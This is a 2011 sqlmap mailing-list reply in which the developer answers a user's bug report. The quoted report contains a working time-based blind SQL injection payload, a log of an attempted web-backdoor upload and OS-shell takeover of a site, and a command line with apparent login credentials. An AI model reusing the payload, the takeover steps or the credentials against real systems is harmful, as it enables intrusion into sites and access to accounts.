hi nightman. thank you fpr your report and find it fixed in the latest commit.
also, i've realized this moment that our "masking" logic for command line exceptions was broken for a month or two. sorry people. it should be fixed now (automatic masking of things like --auth-cred, -u... should be working just fine). kr On Wed, Jun 29, 2011 at 7:05 PM, <night...@email.de> wrote: > I tryed to upload the webbackdoor with no Knowledge of the webserver document > root. The result is a Bug. > > [18:52:39] [INFO] heuristics detected web page charset 'ascii' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: n > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 OR time-based blind > Payload: n=-5351' OR 1181=SLEEP(5) AND > 'DBAH'='DBAH&vurl=http://website.com/content/video16/ > 001Ccmg.avi&cmd=altern > --- > > [18:52:39] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Fedora 5 (Bordeaux) > web application technology: Apache 2.2.0, PHP 5.1.6 > back-end DBMS: MySQL 5 > [18:52:39] [INFO] going to use a web backdoor for command prompt > [18:52:39] [INFO] fingerprinting the back-end DBMS operating system > [18:52:40] [WARNING] time-based comparison needs larger statistical model. > Making a few dummy requests, please > wait.. > [18:52:47] [INFO] the back-end DBMS operating system is Linux > [18:52:47] [INFO] trying to upload the file stager > which web application language does the web server support? > [1] ASP > [2] ASPX > [3] PHP (default) > [4] JSP >> 3 > [18:52:53] [WARNING] unable to retrieve the web server document root > please provide the web server document root [/var/www/]: > [18:55:06] [INFO] retrieved web server full paths: '/members/video.php' > please provide any additional web server full path to try to upload the agent > [Enter for None]: > [18:55:15] [WARNING] HTTP error codes detected during testing: > 403 (Forbidden) - 1 times > > [18:55:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4198), retry > your run with the latest developmen > t version from the Subversion repository. If the exception persists, please > send by e-mail to sqlmap-users@lis > ts.sourceforge.net the following text and any information required to > reproduce the bug. The developers will t > ry to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4198) > Python version: 2.7.1 > Operating system: nt > Command line: C:\pentest\p\sqlmap.0.9-1\sqlmap.py -u > http://website.com/members/video.php?n=769&vurl= > ************************************************************************************************************** > ************************************************************************************************************** > ************************************************************************************************************** > ************************************************************************************************************** > *************************************************************************************************** > --auth-type=basic --auth-cred=mstier07:mstier --random-agent --retries=6 > --level 5 --risk 3 --os-shell > Technique: TIME > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "C:\pentest\p\sqlmap.0.9-1\sqlmap.py", line 86, in main > start() > File "C:\pentest\p\sqlmap.0.9-1\lib\controller\controller.py", line 551, in > start > action() > File "C:\pentest\p\sqlmap.0.9-1\lib\controller\action.py", line 139, in > action > conf.dbmsHandler.osShell() > File "C:\pentest\p\sqlmap.0.9-1\plugins\generic\takeover.py", line 81, in > osShell > self.initEnv(web=web) > File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\abstraction.py", line 151, in > initEnv > self.webInit() > File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\web.py", line 240, in webInit > uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, > raise404=False) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 278, in > getPage > conn = urllib2.urlopen(req) > File "C:\Python27\lib\urllib2.py", line 126, in urlopen > return _opener.open(url, data, timeout) > File "C:\Python27\lib\urllib2.py", line 392, in open > response = self._open(req, data) > File "C:\Python27\lib\urllib2.py", line 410, in _open > '_open', req) > File "C:\Python27\lib\urllib2.py", line 370, in _call_chain > result = func(*args) > File "C:\Python27\lib\urllib2.py", line 1186, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "C:\Python27\lib\urllib2.py", line 1127, in do_open > h = http_class(host, timeout=req.timeout) # will parse host:port > File "C:\Python27\lib\httplib.py", line 681, in __init__ > self._set_hostport(host, port) > File "C:\Python27\lib\httplib.py", line 706, in _set_hostport > raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) > InvalidURL: nonnumeric port: '80\' > > [*] shutting down at 18:55:15 > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
